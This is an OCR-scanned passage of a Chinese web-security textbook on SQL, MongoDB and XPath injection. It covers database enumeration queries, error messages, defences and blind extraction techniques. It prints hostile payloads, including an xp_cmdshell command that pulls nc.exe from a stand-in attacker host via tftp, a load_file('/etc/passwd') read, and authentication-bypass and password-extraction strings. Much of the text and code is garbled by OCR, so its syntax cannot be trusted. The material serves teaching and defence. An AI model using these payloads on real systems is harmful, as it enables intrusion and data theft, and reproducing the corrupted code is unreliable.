Select database() 
获取 当前 用 户 的 权限 


SELECT privilege FROM session_privs 

SELECT grantee, table_name, privilege_type FROM 
INFORMATION_SCHEMA.TABLE_PRIVILEGES 

SELECT * FROM information_schema.user_privileges 
WHERE grantee = '[user]' 此 处 [user] 由 SELECT user) hyii At 
定 


要 求 在 一 个 单独 的 结果 列 中 显示 所 有 表 和 列 
Oracle Select table_name|| 
||column_name from all_tab_columns 
MS-SQL SELECT table_name+' 
',column_name from information_schema.columns 
MySQL SELECT CONCAT(table_namet' 
',column_name) from information_schema.columns 


要 求 显示 用 户 对 象 
Oracle Select object_name, object_type from user_objects 
MS- SELECT name FROM sysobjects 
SQL 
MySQL SELECT table_name FROM information_schema.tables (或 
trigger_name from 
information_schema.triggers< ) 


要 求 显示 用 户 表 

Oracle Select object_name, object_type from 
user_objectsWHEREobject_type="TABLE' 
或 者 显示 用 户 访 问 的 所 有 表 : SELECT table name FROM 
all_tables 

MS- SELECT name FROM sysobjectsWHERExtype='U' 

SQL 

MySQL SELECT table_name FROM information_schema.tables 
where table_type='BASE TABLE' and table_schema!='mysq1' 


要 求 显示 表 foo 的 列 名 称 
Oracle Select column_name, Name from user_tab_columns where 
table_name = 


FOO' 如 果 目 标 数据 不 为 当前 应 用 程序 用 户 所 有 ， 使 用 
ALL table_columns 表 
MS- SELECT column_name, FROM information_schema.columns 
SQL WHERE table_name='foo' 
MySQL SELECT column_name FROM information_schema.columns 
WHERE table_name='foo' 


要 OK 与 操作 系统 交互 〈 最 简单 的 方式 ) 
Oracle ”请 参阅 David Litchfield 所 车 的 The Oracle Hacker's 
Handbook 一 书 
MS- exec xp_cmshell ‘dir c:\' 
SQL 
MySQL select load_file(‘/etc/passwd' ) 


2. SQL 错误 消息 


Oracle ORA-01756: quoted string not properly terminated 
ORA-00933:SQLcommand not properly ended 
MS- Msg 170, Level 15, State 1, Line 1 
SQL Line 1: Incorrect syntax near 'foo 
Msg 105, Level 15, State 1, Line 1 
Unclosed quotation mark before the character 
string 'foo 
MySQL You have an error in your SQL syntax. Check 
the manual that corresponds to your MySQL server version for the 
right 
syntax to use near "foo' at line X 
原因 对 Oracle 和 MS-SQL 而 言 ，SQL 注 入 确实 存在 ， 并 且 几 乎 肯定 
可 以 加 以 利用 。 如 果 输 入 一 个 单 引 和 号， 它 改 变数 据 库 查 询 的 
语法 ， 这 是 预料 之 中 的 错误 
对 MySQL 而 言 ，SQL 注 入 可 能 存在 ， 但 相同 的 错误 消息 可 能 
出 现在 其 他 情况 下 








Oracle PLS-00306: wrong number or types of arguments 
in call to 'XXX' 


MS- Procedure 'XXX' expects parameter '@YYY', 
SQL which was not supplied 
MySQL N/A 





原 己 经 注释 挥 或 删 掉 一 个 通常 会 提交 给 数据 库 的 变量 。 在 MS- 
SQL 中 ， 应 该 可 以 使 用 时 间 延 迟 
枚 举 获 得 任意 数据 
Oracle ORA-01789: query block has incorrect number of 
result columns 
MS- Msg 205, Level 16, State 1, Line 1 
SQL All queries in an SQL statement containing a 
UNION operator must have an equal number of 
expressions in their target lists. 


MySQL The used SELECT statements have a different number of columns 


原因 当 试 图 实施 UNION SELECT 攻击 时 ， 就 会 看 到 这 个 错误 消 
恩 ; 攻击 者 指定 了 一 个 与 原始 
SELECT 语句 不 同 的 列 数 

Oracle ORA-01790: expression must have same datatype 
as corresponding expression 

MS- Msg 245, Level 16, State 1, Line 1 

SQL Syntax error converting the varchar value 
foo' to a column of data type int. 

MySQL “在 MySQL 中 不 会 造成 任何 错误 ) 

原因 当 试 图 实施 UNION SELECT 攻击 时 ， 就 会 看 到 这 个 错误 消 
B; 攻击 者 指定 了 一 个 与 原始 
oe A GRAAL. SG EAYNULL, RAEI 
或 2000 











Oracle ORA-01722: invalid number 
ORA-01858: a non-numeric character was found 


MS- 
SQL 


MySQL 
原 


Oracle 
MS- 
SQL 
MySQL 
I 


Oracle 
MS- 
SQL 
MySQL 


原因 


where a numeric was expected 
Msg 245, Level 16, State 1, Line 1 
Syntax error converting the varchar value 
foo' to a column of data type int. 
(在 MySQL 中 不 会 造成 任何 错误 ) 
输入 与 字段 中 需要 的 数据 类 型 不 匹配 。 可 能 存在 SQL 注入 漏 
洞 ， 可 能 不 需要 一 个 单 引号 ， 因 
此 尝试 输入 一 个 数字 ， 后 接 注入 的 SQL 查 询 l 
在 MS-SQL 中 ， 应 该 可 以 利用 这 条 错误 消息 返回 任何 字符 串 




















ORA-00923: FROM keyword not found where expected 
N/A 


N/A 
下 面 的 语句 可 在 MS-SQL 中 运行 : 

SELECT 1 

但 在 Oracle 中 ， 如 果 想 要 返回 任何 内 容 ， 必 须 从 一 个 表 中 选 
择 。 使 用 DUAL 表 即 可 : 

SELECT 1 from DUAL 


ORA-00936: missing expression 

Msg 156, Level 15, State 1, Line 1 

Incorrect syntax near the keyword ‘from’. 

You have an error in your SQL syntax. Check 
the manual that corresponds to your MySQL 
server version for the right syntax to use 

near ' XXX , YYY from SOME_TABLE' at line 1 

当 注 入 点 出 现在 FROM 关键 字 之 前 〈 例 如 ， 注 入 了 将 要 返回 
的 列 ) 或 使 用 注释 符号 删除 了 不 可 

缺少 的 SQL 关键 字 时 ， 常 常会 看 到 这 条 错误 消息 








尝试 使 用 注释 字符 结束 SQL 语 句 


Oracle 
MS- 
SQL 
MySQL 
原因 


Oracle 
MS- 
SQL 
MySQL 


原因 


Oracle 


当 遇 到 这 种 条 件 时 ，MySQL 可 以 揭示 列 名 XXX, YYY 


ORA-00972: identifier is too long 
String or binary data would be truncated. 


N/A 

这 条 错误 消息 并 不 表示 存在 SQL 注入 漏洞 。 如 果 遇 到 一 个 超 
长 的 字符 串 ， 可 能 会 看 到 这 条 错 

误 消 息 。 也 不 可 能 遇 到 缓冲 区 溢出 ， 因 为 数据 库 正 在 安全 地 
处 理 输入 

ORA-00942: table or view does not exist 

Msg 208, Level 16, State 1, Line 1 

Invalid object name 'foo' 

Table 'DBNAME.SOMETABLE' doesn't exist 











要 么 是 因为 正 试 图 访问 一 个 不 存在 的 表 或 视图 ， 要 么 在 
Oracle 中 ， 数 据 库 用 户 并 不 拥有 访问 

该 表 或 视图 的 权限 。 对 一 个 己 知 能 够 访问 的 表 〈 如 DUAL 表 ) 
MRAN 


当 遇 到 这 种 条 件 时 ，MySQL 应 可 以 揭示 当前 的 数据 库 模 式 
DBNAME 





ORA-00920: invalid relational operator 


MS-SQL Msg 170, Level 15, State 1, Line 1 


Line 1: Incorrect syntax near foo 


MySQL You have an error in your SQL syntax. Check 


原因 


the manual that corresponds to your MySQL 
server version for the right syntax to use 
near " at line 1 


可 能 更 改 了 WHERE 子 句 的 内 容 ，SQL 注 入 试图 使 语法 中 断 


Oracle 
MS- 
SQL 
MySQL 


原因 


Oracle 
MS- 
SQL 
MySQL 


原因 


Oracle 
MS- 
SQL 
MySQL 
原 


Oracle 


ORA-00907: missing right parenthesis 
N/A 


You have an error in your SQL syntax. Check 
the manual that corresponds to your MySQL 

server version for the right syntax to use 

near " at line 1 

SQL 注入 生效 ， 但 注入 点 在 圆 括号 内 。 可 能 是 由 于 用 注入 的 
注释 字符 (--) 把 结尾 的 圆 括号 

当做 注释 处 理 了 


ORA-00900: invalid SQL statement 


Msg 170, Level 15, State 1, Line 1 
Line 1: Incorrect syntax near foo 


You have an error in your SQL syntax. Check 
the manual that corresponds to your MySQL 
server version for the right syntax to use 

near XXXXXX 


一 条 和 常 规 错误 消 息 。 前 面 列 出 的 错误 消 轧 会 优先 于 这 条 错误 
消息 显示 ， 因 此 肯定 出 现 了 其 他 


Ha 可 以 尝试 男 一 种 输入 ， 以 获得 一 条 提供 更 多 信息 的 消 


JO 





ORA-03001: unimplemented feature 
N/A 


N/A 


执行 了 一 个 Oracle 禁 止 的 操作 。 如 果 位 于 UPDATE 或 INSERT 
查询 中 ， 但 却 试图 从 v$version 
显示 数据 库 版 本 字符 串 ， 就 会 出 现 这 条 消息 


ORA-02030: can only select from fixed tables/views 


MS- N/A 

SQL 

MySQL N/A 

原因 ”可 能 试图 编辑 一 个 SYSTEM 视 图 。 如 果 位 于 UPDATE 或 
INSERT# WF, (AAA M 
v$version 显 示 数 据 库 版 本 字符 串 ， 就 会 出 现 这 条 消息 


9.2.14 防止 SQL 注入 


尽管 其 表现 形式 和 利用 手段 的 复杂 程度 各 不 相同 ， 但 通常 而 言 ， 
SQL 注 入 仍然 是 最 容易 防御 的 漏洞 之 一 。 然 而 ， 关 于 SQL 注 入 应 对 措施 
的 讨论 经 常 造 成 误导 ， 许 多 人 都 依赖 仅 部 分 有 效 的 防御 措施 。 

部 分 有 效 的 防御 措施 

由 于 单 引 号 在 SQL 注入 漏洞 中 占有 突出 地 位 ， 防 御 这 种 攻击 的 一 种 
常用 方法 ， 束 是 将 用 户 输入 中 的 任何 单 引 号 配对 ， 对 它们 进行 转 义 。 但 
是 ， 在 下 面 两 种 情况 下 ， 这 种 方法 无 效 。 

口 如 果 用 户 提 交 的 数字 数据 内 置 在 SQL 查询 中 ， 这 种 数据 通常 并 不 
包含 在 单 引 号 内 。 因 此 ， 攻 击 者 能 够 破坏 数据 的 使 用 环境 并 开始 输入 任 
意 SQL 碍 询 ， 这 时 惑 不 必 输 入 单 引 号 。 

口 在 二 阶 SQL 注入 攻击 中 ， 最 初 在 插入 数据 库 中 时 已 经 安全 转 义 的 
数据 随后 被 从 数据 库 中 读 取 出 来 ， 然 后 又 再 次 写 入 。 当 重新 使 用 数据 
RY, RABATI RSE SH STS IBN 

另 一 种 常用 的 应 对 措施 是 使 用 存储 过 程 完 成 全 部 数据 库 访 问 。 无 
疑 ， 定 制 的 存储 过 程 可 增强 安全 性 ， 提 高 性 能 ; 然而 ， 由 于 两 方面 的 原 
因 ， 它 们 并 不 能 保证 防止 SQL 漏洞 。 

口 如 在 使 用 Oracle 的 示例 中 所 见 ， 编 写 存在 缺陷 的 存储 过 程 可 能 在 
自身 代码 中 包含 SQL 注入 漏洞 。 在 存储 过 程 中 构建 SQL 语句 时 也 可 能 
现 类 似 的 安全 问题 ， 使 用 存储 过 程 也 无 法 防止 漏洞 产生 。 

口 即使 使 用 安全 可 靠 的 存储 过 程 ， 但 如 果 使 用 用 户 提 交 的 输入 以 不 
安全 的 方式 调用 这 个 存储 过 程 ， 也 仍然 可 能 出 现 SQL 注 入 漏洞 。 例 如 ， 
ee 能 在 一 个 存储 过 程 中 执行 ， 该 存储 过 程 通过 以 下 方式 调 














exec sp RegisterUser 'joe', 'secret' 


这 个 语句 和 一 个 简单 的 INSERT 语 句 一 样 易于 受到 攻击 。 
例如 ， 攻 击 者 可 以 提交 以 下 密码 : 


foo'; exec master..xp_cmdshell ‘tftp wahh-attacker.com GET nc.exe' 


应 用 程序 将 执行 以 下 批量 查询 : 


exec sp_RegisterUser 'joe', ‘fcoo'; exec master..xp_cmdshell ‘tftp 





wahh-attacker.com GET nc.exe'--' 


因此 使 用 存储 过 程 并 没有 作用 。 

实际 上 ， 功 能 复杂 的 大 型 应 用 程序 需要 执行 成 王 上 万 条 不 同 的 SQL 
语句 ， 许 多 开发 者 认为 ， 使 用 存储 过 程 重 复 执行 这 些 语句 是 对 开发 时 间 
的 不 合理 利用 。 
2. 参数 化 查询 

大 多 数 数据 库 和 应 用 程序 开发 平台 都 提供 API， 对 不 可 信 的 输入 进 
行 安全 处 理 ， 以 防止 SQL 注入 漏洞 。 参 数 化 得 询 《 也 叫 预 处 理 语句 ) 分 
两 个 步 又 建立 一 个 包含 用 户 和 输入 的 SQL 语句 。 

(1) 应 用 程序 指定 查询 结构 ， 为 用 户 输入 的 每 个 数据 预 留 占 位 


(2) 应 用 程序 指定 每 个 占 位 符 的 内 容 。 

至 关 重 要 的 是 ， 在 第 二 个 步骤 中 指定 的 专门 设计 的 数据 无 法 破坏 在 
第 一 个 步骤 中 指定 的 查询 结构 。 因 为 查询 结构 已 经 确定 ， 且 相关 API 对 
所 有 类 型 的 占 位 符 数据 进行 安全 处 理 ， 因 此 它 总 被 解释 为 数据 ， 而 不 是 
语句 结构 的 一 部 分 。 

下 面 的 两 个 代码 示例 说 明了 使 用 用 户 数 据 动 态 创建 的 一 个 不 安全 查 
询 与 相应 的 参数 化 查询 之 间 的 差异 。 在 第 一 段 代码 中 ， 用 户 提 交 的 name 
参数 被 直接 拘 入 到 一 个 SQL 语 句 中 ， 致 使 应 用 程序 易于 受到 SQL 注 入 : 


String queryText = "select ename,sal from emp where ename ='"; 


第 二 上 段 代 人 码 使 用 一 个 问号 作为 用 户 提 交 参 数 的 占 位 符 ， 以 确定 查询 
的 结构 。 随 后 ， 代 码 调 用 prepareStatement 方 法 解释 这 个 参数 ， 并 确定 将 
要 执行 的 查询 结构 。 之 后 ， 它 使 用 setString 方 法 指定 参数 的 实际 值 。 由 
于 查询 的 结构 已 经 固定 ， 这 个 值 可 为 任何 数据 类 型 ， 而 不 会 影响 查询 的 
结构 。 于 是 查询 得 以 安全 执行 : 


























/ RABI 
String cueryText = "SELECT ename,sal FROM EMP WHERE ename = ?"; 


/7 通过 数据 库 连 接 "con " 预 处 理 语句 


con,.prepareStatement (queryTexc) ; 


/7 将 用 户 和 给 入 添加 到 变量 1 FBP EG?) 


stm=t.setString{1, request.getParameter {"name")); 


—_ 
wy 

> YEAR SENT BUG BE SE Pop the BET OO PE A 
应 用 程序 开发 平台 而 异 。 请 参阅 第 18 章 了 解 一 些 最 常用 的 示例 。 


参数 化 查询 可 有 效 防止 SQL 注入 ， 但 还 要 注意 以 下 几 个 重要 的 限 
I} 。 

口 应 在 每 一 个 数据 库 查 询 中 使 用 参数 化 伍 询 。 我 们 友 现 ， 在 开发 应 
用 程序 的 过 程 中 ， 对 于 每 一 个 得 询 ， 开 发 者 都 要 判断 是 否 使 用 参数 化 奋 
询 。 如 果 明 显要 应 用 用 户 提 交 的 输入 ， 惑 使 用 参数 化 查询 ， 人 否则 就 不 使 
用 。 这 种 方法 是 造成 许多 SQL 注入 漏洞 的 根源 所 在 。 首 先 ， 仅 注意 由 用 
户 直 接 提交 的 输入 ， 二 阶 攻击 融 很 容易 被 忽略 ， 因 为 已 经 被 处 理 的 数据 
被 认为 是 可 信 的 。 其 次 ， 在 处 理 用 户 可 控制 的 数据 这 种 特殊 的 情况 下 ， 
我 们 很 容易 犯错 。 在 大 型 应 用 程序 中 ， 各 种 数据 项 被 保存 在 会 话 中 ， 或 
者 由 客户 端 提交 。 其 他 人 可 能 并 不 知道 开发 者 作出 的 假设 。 特 殊 数 据 的 
处 理 方式 将 来 可 能 发 生 改变 ， 在 以 前 安全 的 查询 中 引入 SQL 注 入 漏洞 。 
因此 ， 规 定 在 整个 应 用 程序 中 都 使 用 参数 化 得 询 更 安全 。 

口 插入 但 询 中 的 每 一 种 数据 都 应 适当 进行 参数 化 。 我 们 过 到 过 许多 
这 样 的 示例 : 得 询 中 的 大 多 数 参 数 都 得 到 安全 处 理 ， 然 而 ， 有 一 两 个 数 
据 项 可 直接 连接 到 用 于 指定 查询 结构 的 字符 串 中 。 如 果 以 这 种 方式 处 理 
某 些 参数 ， 即 使 使 用 参数 化 查询 ， 也 无 法 防止 SQL 注入 。 

口 参 数 占 位 符 不 能 用 于 指定 查询 中 表 和 列 的 名 称 。 在 极 少数 情况 
下 ， 应 用 程序 需要 根据 用 户 提交 的 数据 在 一 个 SQL 碍 询 中 指定 这 些 数据 
项 。 当 遇 到 这 种 情况 时 ， 最 好 使 用 一 份 由 己 知 可 靠 的 值 组 成 的 “日 名 
单 *( 即 数据 库 实际 使 用 的 表 和 列 名 单 ) ， 并 拒绝 任何 与 这 份 名 单 上 的 
数据 不 匹配 的 输入 项 。 如 宋 无 法 做 到 这 一 点 ， 就 应 对 用 户 输入 实施 严格 
的 确认 机 制 ， 例 如 ， 只 允许 字母 数字 字符 《不 包括 空白 符 ) ， 并 执行 适 






































当 的 长 度 限 制 。 

口 参 数 占 位 符 不 能 用 于 得 询 的 任何 其 他 部 分 ， 如 ORDER BY 子 句 中 
的 ASC 或 DESC 关 键 字 ， 或 任何 其 他 SQL 关键 字 ， 因 为 它们 属于 查询 结 
构 的 一 部 分 。 与 表 和 列 名 称 一 样 ， 如 果 需 要 基于 用 户 提 区 的 数据 指定 这 
些 项 目 ， 则 必须 对 其 执行 严格 的 昌 名 单 确 认 ， 以 防止 可 能 的 攻击 。 

3. 深层 防御 

通常 ， 一 种 稳定 的 安全 机 制 应 采用 深层 防御 措施 提供 额外 的 保护 ， 
以 防止 前 端 防御 由 于 任何 原因 失效 。 当 防御 针对 后 端 数据 库 的 攻击 时 ， 
应 采用 另外 三 层 防御 。 

口 当 访 问 数据 库 时 ， 应 用 程序 应 尽 可 能 使 用 最 低 权 限 的 账户 。 一 上 般 
情况 下 ， 应 用 程序 并 不 需要 数据 库 管理 员 权 限 ， 它 只 需要 读 取 并 写 入 上 自 
己 的 数据 。 在 注 章 安全 的 情况 下 ， 应 用 程序 可 以 使 用 男 一 个 数据 库 账户 
执行 各 种 操作 。 例 如 ， 如 果 90% 的 数据 库 查 询 只 需要 读 取 访问 ， 就 可 以 
使 用 一 个 并 不 具有 写 入 权限 的 账户 执行 这 些 查 询 。 如 果菜 个 查询 只 需要 
读 取 一 部 分 数据 (例如 ， 读 取 订 单 表 而 不 是 用 户 账 户 表 〉 ， 这 时 就 可 以 
使 用 一 个 拥有 相应 访问 权限 的 账户 。 如 果 可 以 在 整个 应 用 程序 中 实施 这 
种 方法 ， 就 可 以 降低 任何 剩余 SQL 注入 漏洞 给 应 用 程序 造成 的 影响 。 

口 许 多 企业 数据 库 包 含 大量 默 认 功能 ， 可 被 能 够 执行 任意 SQL 语 名 
的 攻击 者 利用 。 如 有 可 能 ， 应 删除 或 禁用 不 必要 的 功能 。 即 使 有 时 候 技 
术 熟 练 、 葬 意 破 坏 的 攻击 者 能 够 通过 其 他 方法 重新 建立 一 些 必需 的 功 
能 ， 但 做 到 这 一 点 通常 需要 复杂 的 操作 ， 而 且 数 据 库 实施 的 强化 措施 也 
会 给 攻击 者 造成 难以 逾越 的 障碍 。 

口 应 评估 、 测 试 并 及 时 安装 供应 了 商 发 布 的 所 有 安全 补丁 ， 以 修复 数 
据 库 软件 本 喘 己 知 的 漏洞 。 在 注重 安全 的 情况 下 ， 数 据 库 管 理 员 可 以 使 
用 各 种 预订 服务 (subscriber-based service) 提前 了 解 一 些 供应 商 尚 未 公 
布 补丁 的 已 知 漏洞 ， 及 时 采取 适当 的 防御 措施 。 









































9.3 JF ANoSOL 


术语 NoSQL 用 于 指 各 种 不 同 于 标准 的 关系 数据 库 体 系 架 构 的 数据 存 
储 区 。NoSQL 数 据 存 储 区 呈现 使 用 键 / 值 映射 的 数据 ， 并 且 不 依赖 于 固 
定 的 方案 ， 如 传统 的 数据 库 表 。 键 和 值 可 以 任意 定义 ， 而 且 值 的 格式 通 
第 与 数据 存储 区 无 天 。 键 / 值 存储 的 男 一 个 特点 在 于 ， 值 可 能 为 数据 结 
a 案 中 的 平面 数据 结构 

文 持 上 述 数 据 存 储 的 NoSQL 具 有 各 方面 的 优势 ， 这 些 优势 主要 体现 
在 处 理 庞 大 的 数据 集 方面 ， 以 便于 根据 需 ;要 对 数据 存储 区 中 的 层次 化 数 
据 进 行 优 化 ， 以 减少 检索 数据 集 的 开销 。 在 这 些 情况 下 ， 传 统 的 数据 库 

可 能 需要 对 表 进 行 复杂 的 交叉 引用 ， 才 能 代表 应 用 程序 检索 信息 。 

从 Web 应 用 程序 安全 的 角度 看 ， 我 们 主要 关注 应 用 程序 如 何 查 询 数 
据 ， 因 为 这 决定 了 攻击 者 可 以 进行 何 种 形式 的 注入 。 就 SQL 注 入 而 言 ， 
不 同 数据 库 产品 采用 的 SQL 语言 大 体 相 似 。 相 反 ，NoSQL 代 表 着 一 类 全 
-e 它们 的 行为 各 不 相同 。 而 且 ， 它 们 并 非 全 都 使 用 单一 
EVA la c o 

以 下 是 NoSQL 数 据 存储 区 采用 的 一 些 常用 的 查询 方法 : 

口 键 / 值 查 询 ; 

口 XPath 将 在 本 章 后 面部 分 介绍 

口 编程 语言 〈 如 JavaScript) 。 

NoSQL 是 一 种 快速 发 展 的 相对 较 新 的 技术 。 与 SQL 等 比较 成 熟 的 技 
术 不 同 ， 它 并 没有 进行 大 规模 地 部 署 。 因 此 ， 对 于 NoSQL 相 关 漏 润 的 研 
究 仍 处 于 早期 阶段 。 此 外 ， 由 于 许多 NoSQL 技 术 访 问 数据 的 方式 十 分 简 
单 ， 讨 论 注入 NoSQL 数 据 存储 区 的 示例 有 时 明显 是 虚构 的 。 

几乎 可 以 肯定 的 是 ， 当 前 和 将 来 的 Web 应 用 程序 使 用 NoSQL 数 据 存 
储 区 的 方式 将 存在 可 被 利用 的 漏洞 。 我 们 将 在 下 一 节 中 讨论 一 个 这 样 的 
示例 ， 该 示例 源 于 真实 的 应 用 程序 。 
注入 MongoDB 

许多 NoSQL 数 据 库 利 用 现 有 的 编程 语言 来 提供 灵活 、 可 编程 的 查询 
机 制 。 如 果 使 用 字符 串 连接 构建 查询 ， 攻 击 者 就 可 以 尝试 破坏 数据 并 更 
改 查 询 的 语法 。 以 下 面 的 查询 为 例 ， 它 基于 MongoDB 数 据 存 储 区 中 的 
用 户 记 录 进 行 登录 : 



































= new Mong 
$al Sm->oemedh 
Scol biG = 3 
$js = unction{) 
return this.username == ‘$username’ & this.password == ‘Spas Y } 

Sobj = $collection->findOne(array('Swhere' => $js)); 
if (isset {Sobj[ i 
f 
t 

S$loggea_in=] 
n 
else 


$js 是 一 个 JavaScript 函 数 ， 其 代码 是 动态 构建 的 ， 并 且 包 含 用 户 提 
a a 0 
OS UE I. F: 


Marcus'// 
生成 的 JavaScript 函 数 如 下 所 示 : 


unctio 


1 this.username == 'Marcus'//' & this.password == 'aea'; 


daa 
Sy 
=> 注解 在 JavaScript 中 ， 双 正 斜 本 VO 表示 行 尾 注释 ， 因 
此 ， 函 数 中 的 剩余 代码 将 被 注释 掉 。 

另 一 种 不 使 用 注释 而 确保 $js 函 数 始 终 返 回 “ 真 ”的 方法 ， 是 提供 
以 下 用 户 名 : 


a* || I8 || ee ae eS 
JavaScript 以 如 下 方式 解释 各 种 运算 符 : 


性 








cnls. username == À 


‘aaa')}; 


这 将 匹配 用 户 集合 中 的 所 有 资源 ， 因 为 第 一 个 选择 性 条 件 始终 
为 真 〈1 始 终 等 于 1) 。 


9.4 注入 XPath 


XPath (XML 路 径 语 言 ) 是 一 种 用 于 导航 XML 文档 并 从 中 获取 数据 
的 解释 型 语言 。 许 多 时 候 ， 一 个 XPath 表达 式 代 表 由 一 个 文档 节点 导航 
到 另 一 个 文档 节点 所 需要 的 一 系列 步 又。 

如 果 Web 应 用 程序 将 数据 保存 在 XML 文档 中 ， 那 么 它们 可 能 使 用 
XPath 访问 数据 ， 以 响应 用 户 提交 的 输入 。 如 果 这 个 输入 未 经 任何 过 滤 
或 净化 就 插入 到 XPath 查询 中 ， 攻 击 者 就 可 以 通过 控制 查询 来 破坏 应 用 
程序 的 逻辑 ， 或 者 获取 未 获 授 权 访 问 的 数据 。 

通常 ，XML 文 档 并 不 是 保存 企业 数据 的 首选 工具 。 但 是 ， 它 们 常 
常 被 用 于 保存 可 根据 用 户 输入 获取 的 应 用 程序 配置 数据 。 小 型 应 用 程序 
也 使 用 它们 保存 简单 的 信息 ， 如 用 户 证 书 、 角 色 和 权限 。 以 下 面 的 
XML 数据 为 例 : 


























<addressBook> 

<address> 
<firstName>William</firstName> 
<surname>Gates</surname> 
<password>MSRocks!</password> 
<email>billyg@microsoft.com</email> 
<ccard>5130 8190 3282 3515</ccard> 

</address> 

<address> 
<firstName>Chris</firstName> 
<surname>Dawes</surname> 
<password>secret</password> 
<email>cdawes@craftnet .de</email> 
<ccard>3981 2491 3242 3121</ccard> 

</address> 

<address> 
<firstName>James</firstName> 
<surname>Hunter</surname> 
<password>letmein</password> 
<email>james.hunter@pookmail.com</email> 
<ccard>8113 5320 8014 3313</ccard> 

</address> 

</addressBook> 


一 个 获取 所 有 电子 邮件 地 址 的 XPath 但 询 如 下 : 


//address/email/text () 
一 个 返回 Dawes 的 全 部 用 户 资料 的 查询 为 : 
//address [surname/text()='Dawes'] 


fE— HE WA Ree, A pec ai A EB tk A BUX Path A A 
中 ， 碍 询 的 结果 可 能 在 应 用 程序 的 啊 应 中 返回 ， 或 者 用 于 决定 应 用 程序 
东 些 方面 的 行为 。 


9.4.1 ”破坏 应 用 程序 逻辑 


以 一 个 根据 用 户 名 和 密码 获得 用 户 保 存 的 信用 卡号 码 的 应 用 程序 功 
0 0 
ZH: 


/ /aGGress[surname/text(})='Dawes' and passwordc/text()='secret']/ccard/ 








与 利用 SQL 注入 漏洞 一 样 ， 这 时 攻击 者 也 可 以 破坏 应 用 程序 的 碍 
询 。 例 如 ， 提 区 密码 值 


ER 
将 导致 下 面 的 XPath 得 询 ， 获 取 所 有 用 户 的 信用 卡 信 息 : 


/ /adaGress [surname/text()="Dawes' and password/text(}= or tateta’j/ 





ccard/text [) 


E 
S 注解 

口 与 SQL 注入 一 样 ， 注 入 一 个 数字 值 时 不 需要 单 引 号 。 

口 与 SQL 和 查询 不 同 ，XPath 碍 询 中 的 关键 字 区 分 大 小 写 ，XML 
文档 中 的 元 素 名 也 区 分 大 小 写 。 





9.4.2 i@thXPathy+ 


攻击 者 可 利用 XPath 注入 漏洞 从 目标 XML 文档 中 获取 任意 信息 。 获 
取信 息 的 一 种 可 靠 途径 是 使 用 和 上 述 SQL 注 入 时 相同 的 技巧 ， 促 使 应 用 
程序 根据 攻击 者 指定 的 条 件 以 不 同 的 方式 做 出 啊 应 。 

her ae OD rsh 一 种 情况 返 
朵 ， 但 第 二 种 情况 不 返回 结 





: ge ISL ana Ta aTa 
t @r D2 aie "a e" 
这 种 行为 差异 可 用 于 测试 任何 特殊 条 件 的 真 假 ， 因 此 可 通过 它 一 次 





一 个 字 节 地 提取 出 任意 信息 。 与 SQL 一 样 ， 
符 串 函数 ， 可 用 它 一 次 一 个 字符 地 测试 一 个 字符 串 的 值 。 例 如 ， 提 交 密 
Ay 

' or /faddress[surname/text({)-"Gates' and substring {password/text{),1,1)= 


'M'] and ‘a‘-‘a 


将 导致 下 面 的 XPath 查询 ， 如 果 用 户 Gates 密 人 码 的 第 一 个 字符 为 M， 将 返 
回 查 询 结 果 : 


/ address [surname/ text [)='Dawes' and password/text(})}='"' or 





/f/adéress|surname/text({)='Gates' and substring{password/text(),1,1})= 'M'] 


and ‘a' 


轮流 针对 每 个 字符 位 置 并 测试 每 个 可 能 的 值 ， 攻 击 者 就 能 够 获得 
Gates 的 完整 密码 。 


-'a ‘']/ccard/text() 


尝试 访问 


http://mdsec.net/cclookup/14/ 


9.4.3 B H XPath} 


在 前 面 的 攻击 中 ， 注 入 的 测试 条 件 指 定 了 提取 数据 的 绝对 路 径 
(address) 以 及 目标 字段 的 名 称 〈surname 和 password) 。 实 际 上 ， 即 使 
不 了 解 这 些 信 息 ， 攻 击 者 仍 有 可 能 发 动 完全 盲目 的 攻击 。XPath 人 查询 可 
包含 与 XML 文档 中 当前 节点 有 关 的 步骤 ， 因 此 ， 从 当前 节点 可 以 导航 
到 父 节 点 或 一 MERE TS PH ek 男 外 ，XPath 包 含 可 查询 文档 元 信息 
(包括 特殊 元 系 的 名 称 BR) 的 函数 。 使 用 这 些 技巧 就 可 以 提取 出 文档 中 所 
ca 点 的 名 称 与 值 ， 而 不 必 提 前 知道 与 它 的 结构 或 内 容 有 关 的 任何 信 


例如 ， 可 以 使 用 前 面 描述 的 子 字符 串 技 巧 ， 通 过 提交 如 下 格式 的 冤 
码 ， 提 取 当 前 节 反 的 父 节 点 的 名 称 : 


' or substring (name (parent: : * [position()=1]) 1)= ‘a 


这 个 输入 能 够 返回 HA 因为 address 节 oe, 轮 到 
第 二 个 字母 ， 这 时 可 以 通过 提交 下 列 密码 确定 该 字母 为 6， 因为 最 后 一 
个 输入 返回 了 结果 : 














or substring(name(parent::*[position()=1)),2,1)=‘a 
' or substring (name (parent: :*[position()=1]},2,1)='b 
' or substring (name (parent: :*[position()=1]},2,1)='c 
' or substring (name(parent::* [position()=1])},2,1)='‘d 


人 确定 address 市 点 的 名 称 后 ， 攻击 者 就 可 以 轮流 攻击 它 的 每 一 个 子 节 
点 ， 提 取出 它们 的 名 称 与 值 。 通 过 索引 指定 相关 了 于 节点 可 不 必 知 道 任 何 
节点 的 名 称 。 例 如 ， 下 面 的 查询 将 返回 值 Hunter: 


//address [position(}-3]/child: :node({} [position()-4]/text()} 


而 下 面 的 查询 返回 值 letmein: 


//address [position(}=3]/child: :node() [position()=6]/text{) 


这 种 技巧 可 用 在 完全 盲目 的 攻击 中 ， 
任何 结果 ， 我 们 可 以 设计 一 个 注入 的 条 件 ， sae is eee a 
如 ， 如 果 Gates 密 一 个 字母 为 M， 人 结果 : 


or substring (//address[position()=1]/child: :node() [posit 
text({),1,1)= 'M' and 'a'='a 


轮流 攻击 每 个 地 址 节点 的 每 个 子 节操， 并 一 次 一 个 字符 地 提取 出 它 
们 的 值 ， 攻 击 者 就 可 以 提取 整个 xML 数 据 的 内 容 。 





tion{)=6]/ 





Vv a: XPath 中 有 两 个 有 用 的 函数 ， 可 帮助 自动 完成 上 述 攻 
击 ， 迅 速 遍历 XML 文档 中 的 所 有 节点 和 数据 。 
ee O 。 这 个 函数 返回 指定 元 素 的 子 节点 数量 ， 可 用 于 确 
定 需 要 遍历 的 position © 值 的 范围 。 
Ostring-length © 。 这 个 函数 返回 一 个 已 提交 字符 串 的 长 度 ， 
可 用 于 确定 需要 遍历 的 substring ©) 值 的 范围 。 
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VES ie PPR EES QL A UF BY Ca AF BO HE AC — BS aF 
